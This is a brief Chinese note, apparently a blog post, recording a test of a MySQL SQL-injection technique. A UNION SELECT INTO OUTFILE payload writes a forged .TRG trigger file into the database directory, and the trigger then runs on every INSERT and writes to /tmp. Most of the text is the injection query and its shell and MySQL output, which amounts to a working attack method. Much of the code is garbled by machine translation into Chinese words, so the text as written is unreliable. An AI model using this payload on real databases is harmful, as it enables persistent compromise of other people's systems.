文/ superhei
 
 
当时一直没有去测试，今天测试了一下，记录一下
 
 
 
递减aa.article;
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
|场|类型| NULL |重点|默认|额外|
+ -------- --- + -------------- + ------ + ----- + --------- + -------- -------- +
| articleid | INT（11）|号|优先级| NULL | AUTO_INCREMENT |
|标题| VARCHAR（100）|号| | | |
内容|文字|否| |空| |
+ ----------- + -------------- + ------ + ----- + --------- + ---------------- +
3行集（0.01秒）
 
执行语句：
SELECT *从文章articleid = 3和1 = 2 UNION SELECT NULL，NULL，'类型=触发器“成OUTFILE
'的/ var / lib中/ MySQL的/ AA / article.TRG“线端”\ ntriggers = \'的CREATE DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n选择1111到OUTFILE
 
选择*从文章里articleid = 3和1 = 2 UNION SELECT NULL，NULL，'型=触发INTO OUTFILE
    - >'/ VAR / LIB / MYSQL / AA / article.TRG“线端”\ ntriggers = \'创作DEFINER的'根'@'本地主机'用户插入的每一行后触发ATK \ \ nbegin \ \ n选取1111 INTO OUTFILE
（0.04秒）确定，1行受影响的
 
本地文件：
根@的Ubuntu :/ VAR / LIB / MYSQL / AA＃猫article.TRG
\ n \ N型触发器
触发器='创建DEFINER的'根'@'本地主机'触发攻击后，用户每一行的插入\ nbegin \ n选取1111 INTO OUTFILE
 
 
 
 
 
LS / tmp / aa.txt文件中
LS：无法访问的/ tmp / aa.txt文件：没有那个文件或目录
 
回到mysql的外壳下执行：
 
MySQL的>插入到文章（articleid，标题，内容）值（20,2,3）;
1行受影响（0.00秒）查询确定，
 
再看看文件：
根@ Ubuntu的:/ VAR / LIB / MYSQL / AA上＃ls / tmp / aa.txt文件中
的/ tmp / aa.txt文件
的根的Ubuntu :/ VAR / lib目录/ MYSQL / AA＃猫
 
 
:)